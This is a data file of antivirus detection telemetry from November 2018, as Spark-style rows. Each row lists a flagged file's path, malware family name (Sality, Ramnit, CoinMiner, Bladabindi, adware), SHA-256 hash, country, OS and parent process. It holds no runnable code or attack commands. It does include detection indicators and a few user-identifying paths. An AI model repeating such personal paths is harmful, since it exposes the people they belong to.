  Row(detection=Row(filename='z8j7cvbc5.exe', filepath='\\\\?\\C:\\Program Files\\Z8J7CVBC5R\\Z8J7CVBC5.exe', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:57:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered lacid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lacid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a70a3042b79fab309d8c4c27918d2264c8f48d6169355e45c8fbd8c074c3329a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T10:52:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T09:25:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='audiodg.exe', filepath='\\\\?\\C:\\Windows\\system32\\AUDIODG.EXE', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='81b2028bd8121fca831eafaef363ad131dbf0a93e48d2f1f7c7f71b5de915c29', metadata=Row(cmdline=None, country='LY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:03:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-183326-9785c487', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eba24208\\AVSCAN-20181104-141832-F573C2FF\\AVSCAN-20181104-183326-9785C487', filesize=556000, name='PUA/MPCCleaner.#M1.#R1'), hash='08cce85de6b7808af17666c9689a16e424590770839d9ee966d73b9580abc94f', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T15:31:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='new_folder.exe', filepath='C:\\Users\\X\\Desktop\\New_Folder.exe', filesize=384000, name='W32/Sality.AA.#M1.#R1'), hash='43fc3e764d603d8dc5e7779fd56a74ac20a2af07b8c38b4b609eb3ab0d13520d', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T12:57:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a52205d2d059347e8a0edc4581ff4356b4001c97d612c9b768591f4197371bbb.mrg', filepath='D:\\TotalAutomation\\CategorizationLayer\\18.01.2018-233.available\\Avira\\Others\\PE-detected-Avira\\Adware.CrossRider.ztzyp\\a52205d2d059347e8a0edc4581ff4356b4001c97d612c9b768591f4197371bbb.MRG', filesize=2096000, name='Adware/CrossRider.ztzyp.#M1.#R1'), hash='a52205d2d059347e8a0edc4581ff4356b4001c97d612c9b768591f4197371bbb', metadata=Row(cmdline='D:\\\\\\\\TotalAutomation\\\\\\\\CategorizationLayer\\\\\\\\23.01.2018-87.available\\\\\\\\Avira\\\\\\\\Others\\\\\\\\PE-detected-Avira -PERHASH', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\TotalAutomation\\Dependencies\\Buf\\WWPERHASH.exe', parentsize=1842176, timestamp='2018-11-04T08:56:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp5239353\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\Arquivos Computador\\Downloads\\aTube_Catcher_3391194583.exe', parentsize=2629936, timestamp='2018-11-04T13:29:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-222348-87a3fa1d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6931b99d\\AVSCAN-20181104-221652-2BB38B21\\AVSCAN-20181104-222348-87A3FA1D', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:23:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='№19 свод высшая дина.exe', filepath='f:\\файлы скрыты трояном\\аттестау\\№19 СВОД ВЫСШАЯ Дина.exe', filesize=1728000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='0515d0eca95010b0ebc279d0f5ae9547173c3b9185931b2f02d54b951840c1ff', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:31:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-141240-3ec4203f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6125d533\\AVSCAN-20181104-135312-59F9F13F\\AVSCAN-20181104-141240-3EC4203F', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='1687483a29c55e00b2e6b3f69b81db32acf7df9c79b07a83f3f72067d84ebb31', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:42:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msqry32.exe', filepath='C:\\Program Files (x86)\\Microsoft Office\\Office12\\MSQRY32.EXE', filesize=732000, name='W32/Sality.#M1.#R1'), hash='7f52a8e010c576023e63a142ec0259e97e6ee0daa9cdf1e9af316496b8f63e7c', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Avira\\SoftwareUpdater\\Avira.SoftwareUpdater.ServiceHost.exe', parentsize=102816, timestamp='2018-11-04T18:49:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-200643-4f40a102', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed916b94\\AVSCAN-20181104-200630-4DABF2B8\\AVSCAN-20181104-200643-4F40A102', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:06:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T19:19:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T06:12:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-13-51-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T19:12:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp3187493\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:UVBkZCU1FkpATXN8xSQ \\\\\\/mnl', country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\BitF53E.tmp.exe', parentsize=2690240, timestamp='2018-11-04T10:03:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:32:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f_01de1c', filepath='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_01de1c', filesize=284000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='a1ec2c5eade822fa5404707ea0106303517e8624e74c1b785914a4514512924f', metadata=Row(cmdline=None, country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe', parentsize=1589080, timestamp='2018-11-04T19:19:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00024276', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00024276', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:45:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-124541-7a797447', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9be05e77\\AVSCAN-20181104-124529-780B9FB7\\AVSCAN-20181104-124541-7A797447', filesize=2176000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='86de3d5dc1678919598aab07ecffaaeaf0e05b1b907a73d8b2d933d7fccd3095', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:45:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-055848-59f05c3a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01dbbab1\\AVSCAN-20181105-054924-2355A1B0\\AVSCAN-20181105-055848-59F05C3A', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:58:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tcupdater.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\TCSystem\\TCUpdater.exe', filesize=1088000, name='HEUR/APC.#M1.#R1'), hash='2778037bc22ff4333facb7e8bedea1523bd7a63a6a7476142b497339a65d269e', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:12:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lja7shayne7.vir', filepath='\\\\?\\C:\\RECYCLER\\S-1-5-21-0243556031-888888379-781862338-196852800\\lja7shayne7.VIR', filesize=128000, name='HEUR/AGEN.1012767.#M1.#R1'), hash='96fa6d1f89cc961fefef97a6863806ebd39e3547568789751603c5c830a511a8', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:23:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T12:14:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-212251-4e3c1aa0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-212251-4E3C1AA0', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:22:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-214626-4d3e1d31', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-214626-4D3E1D31', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:46:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-174227-fbd357e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3e5b5006\\AVSCAN-20181104-174117-ED7D5097\\AVSCAN-20181104-174227-FBD357E9', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:42:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fsquirt.exe', filepath='C:\\Windows\\System32\\DriverStore\\FileRepository\\bth.inf_x86_neutral_e9873718d5894498\\fsquirt.exe', filesize=256000, name='W32/Jeefo.A.#M1.#R1'), hash='d45ea1f70654a589976238bd3fedb2d810e90fd36ec55ef6f8978776349f8772', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Smadav\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T04:22:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='bin2elf.exe', filepath='C:\\Flashtool\\x10flasher_lib\\bin2elf.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='1cc0898f5cb28f881016a39aa54fed4a5aacbc0e7de849d186f3efa30209d73d', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-04T16:13:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210612-9a381f81', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-210612-9A381F81', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:06:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='winrar.exe', filepath='\\\\?\\C:\\Program Files\\WinRAR\\WinRAR.exe', filesize=1068000, name='W32/Ramnit.C.#M1.#R1'), hash='281c030c6f339be9d06a0122ea294b463cebdd6f361a20fa50821150bba55478', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:21:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-175820-70b370c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3acc0c55\\AVSCAN-20181104-175357-56B501E5\\AVSCAN-20181104-175820-70B370C6', filesize=2496000, name='Adware/Wajam.deane.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:57:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-134751-5b02696d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9be05e77\\AVSCAN-20181104-134739-58939581\\AVSCAN-20181104-134751-5B02696D', filesize=2176000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='86de3d5dc1678919598aab07ecffaaeaf0e05b1b907a73d8b2d933d7fccd3095', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:47:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsaBCDF.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-04T14:30:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hl.exe:xguard', filepath='\\?\\C:\\Games\\Counter-Strike\\hl.exe:xguard', filesize=448000, name='HEUR/APC.#M1.#R1'), hash='0dcb5d826951e384eae566b477639eae50e4e0d186e58047c6de99f512d96410', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:55:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dwtrig20.exe', filepath='\\\\?\\D:\\Windows.old\\$Recycle.Bin\\S-1-5-21-2546026669-3719340801-3304677598-1000\\$RZEG9TG\\mega\\AutoPlay\\Plugins\\Office 2007 Ente\\Office.en-us\\dwtrig20.exe', filesize=476000, name='W32/Neshta.A.#M1.#R1'), hash='9cba9ef1e8dd4bb883f628fc9a51cbdbedc4ce2eb00ca42212ccce321e7d7f9e', metadata=Row(cmdline=None, country='NG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:22:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='obfpmxtbmp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\obfpmxtbmp.exe', filesize=75776000, name='WORM/Lodbak.Gen4.#M300.#R300556'), hash='30f8921b830c23bb51450af865dbeb4f4f62509c857a6cab1482c649953f5134', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:07:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0182510.exe', filepath='d:\\system volume information\\_restore{a0838581-84a6-4d91-8040-c33e0d667479}\\rp101\\A0182510.exe', filesize=256000, name='SPR/PowerReg.b1c843.#M1.#R1'), hash='b1c84398ff562cf2028555d8d497a372dc65e0739a8ec7b771608fd2667199c5', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T04:14:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T00:09:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-190520-ccf6e083', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b343094\\AVSCAN-20181104-190429-C8275BC2\\AVSCAN-20181104-190520-CCF6E083', filesize=676000, name='Adware/CsdiMonetize.gyfvd.#M1.#R1'), hash='038bc8ffd03a5d58976a1bc096aa46d8079febf9179634e3417943ee3c8476bb', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:07:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-222259-d84ad23a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-222259-D84AD23A', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:23:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='clickjogos - governor of poker (1).exe', filepath='C:\\Users\\X\\Downloads\\ClickJogos - Governor Of Poker (1).exe', filesize=2288000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='70629a7a377c09b011d874d933e4b474ab32ef8e7edb1d5e7a1ddd4c9dc92ec7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T17:26:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp006592b8', filepath='C:\\Windows\\Temp\\96471c11-35d4-4dc9-ad1d-2aa0b87bc74b\\tmp000002e4\\tmp006592b8', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:46:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221609-652b0593', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221609-652B0593', filesize=64000, name='TR/Siggen.jziio.#M1.#R1'), hash='90568927525dfcaaa660df9052a3ca5011f215b8d8955afe267f85fc3ff979e8', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:16:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hdupdrv64.exe', filepath='i:\\program\\new pro 2017\\driver\\drv10.6+easydrv3.5.byghazi2010\\drivers\\audio\\audio g41\\via\\viahdaud\\HDUpDrv64.exe', filesize=64000, name='TR/Crypt.ZPACK.Gen4.#M1.#R1'), hash='9de29e66bd99e111035a0fd65a60c31d3d428b42d9e8f73bc5101f399b801137', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:44:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cbfae7d7d3b004222d52460bb8e2dd462b0a98d01eae37c573e1a096f0a9d1f5.mrg', filepath='D:\\TotalAutomation\\CategorizationLayer\\07.04.2018-102.available\\Avira\\Others\\PE-detected-Avira\\BDS.Bladabindi.ajoqj\\cbfae7d7d3b004222d52460bb8e2dd462b0a98d01eae37c573e1a096f0a9d1f5.MRG', filesize=1024000, name='BDS/Bladabindi.ajoqj.#M1.#R1'), hash='cbfae7d7d3b004222d52460bb8e2dd462b0a98d01eae37c573e1a096f0a9d1f5', metadata=Row(cmdline='D:\\\\\\\\TotalAutomation\\\\\\\\CategorizationLayer\\\\\\\\07.09.2017-13.available\\\\\\\\Avira\\\\\\\\Others\\\\\\\\PE-detected-Avira -PERHASH', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\TotalAutomation\\Dependencies\\Buf\\WWPERHASH.exe', parentsize=1842176, timestamp='2018-11-02T12:39:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T14:07:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ultimatedefrag.exe', filepath='C:\\Users\\X\\Desktop\\Hirens 7\\HBCD\\Programs\\UltimateDefrag.exe', filesize=64000, name='TR/Siggen.jziio.#M1.#R1'), hash='90568927525dfcaaa660df9052a3ca5011f215b8d8955afe267f85fc3ff979e8', metadata=Row(cmdline='\\\\\\/Install \\\\\\/Update \\\\\\/Quiet  \\\\\\/InstallFile \\\\\\"C:\\\\\\\\$WINDOWS.~BT\\\\\\\\Sources\\\\\\\\Install.esd\\\\\\" \\\\\\/progressCLSID 06cfe2c4-1c5b-4002-bca2-d0667fe5b626 \\\\\\/ReportId {C3BD4254-41A1-4918-A51A-1C74251DF7F3}.201 \\\\\\"\\\\\\/ClientId\\\\\\" \\\\\\"1eeffbbd-5a32-4a02-af22-5323b7db6150\\\\\\" \\\\\\"\\\\\\/CorrelationVector\\\\\\" \\\\\\"pR8P7z\\\\\\/JgEW3X9Vd.5.1.2\\\\\\" \\\\\\/WUCachedFileName \\\\\\"17134.1.180410-1804.rs4_release_CLIENTCONSUMER_RET_x86FRE_en-us.esd\\\\\\"', country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\$WINDOWS.~BT\\Sources\\SetupHost.exe', parentsize=697528, timestamp='2018-11-02T20:27:26Z'), dt=datetime.date(2018, 11, 2)),
